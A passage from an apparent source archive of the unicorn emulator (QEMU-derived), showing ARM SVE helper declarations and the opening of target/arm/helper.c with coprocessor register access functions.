TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hsu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hsu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bhu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bsu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bdu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bhs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bss_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1bds_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hsu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hsu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1hds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1sds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldnf1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st2dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st3dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st4dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bh_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1bd_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hs_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hs_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1hd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1sd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_st1sd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbsu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbss_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbsu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhsu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbss_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbdu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbds_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbdu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbds_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbdu_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_lddd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldbds_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldhds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldsds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbsu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbss_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbsu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhsu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbss_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbdu_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbds_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbdu_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbds_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbdu_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsdu_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffdd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffbds_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffhds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_ldffsds_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbs_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbs_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sths_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stss_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbd_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_le_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_be_zsu, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbd_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_le_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_be_zss, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stbd_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_sthd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stsd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_le_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_6(sve_stdd_be_zd, TCG_CALL_NO_WG, void, env, ptr, ptr, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve2_pmull_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/helper.c��������������������������������������������������������������0000664�0000000�0000000�00001534151�14675241067�0017655�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM generic helpers. * * This code is licensed under the GNU GPL v2 or later. * * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "internals.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "qemu/bitops.h" #include "qemu/crc32c.h" #include "exec/exec-all.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "qemu/range.h" #include "qemu/guest-random.h" #include "arm_ldst.h" #include "exec/cpu_ldst.h" #include "kvm-consts.h" #ifdef TARGET_AARCH64 #include <qemu/guest-random.h> #endif #define ARM_CPU_FREQ 1000000000 /* FIXME: 1 GHz, should be configurable */ static bool get_phys_addr_lpae(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, target_ulong *page_size_ptr, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs); static void switch_mode(CPUARMState *env, int mode); static uint64_t raw_read(CPUARMState *env, const ARMCPRegInfo *ri) { assert(ri->fieldoffset); if (cpreg_field_is_64bit(ri)) { return CPREG_FIELD64(env, ri); } else { return CPREG_FIELD32(env, ri); } } static void raw_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { assert(ri->fieldoffset); if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(env, ri) = value; } else { CPREG_FIELD32(env, ri) = value; } } static void *raw_ptr(CPUARMState *env, const ARMCPRegInfo *ri) { return (char *)env + ri->fieldoffset; } uint64_t read_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri) { /* Raw read of a coprocessor register (as needed for migration, etc). */ if (ri->type & ARM_CP_CONST) { return ri->resetvalue; } else if (ri->raw_readfn) { return ri->raw_readfn(env, ri); } else if (ri->readfn) { return ri->readfn(env, ri); } else { return raw_read(env, ri); } } /* * Some registers are not accessible if EL3.NS=0 and EL3 is using AArch32 but * they are accessible when EL3 is using AArch64 regardless of EL3.NS. * * access_el3_aa32ns: Used to check AArch32 register views. * access_el3_aa32ns_aa64any: Used to check both AArch32/64 register views. */ static CPAccessResult access_el3_aa32ns(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { bool secure = arm_is_secure_below_el3(env); assert(!arm_el_is_aa64(env, 3)); if (secure) { return CP_ACCESS_TRAP_UNCATEGORIZED; } 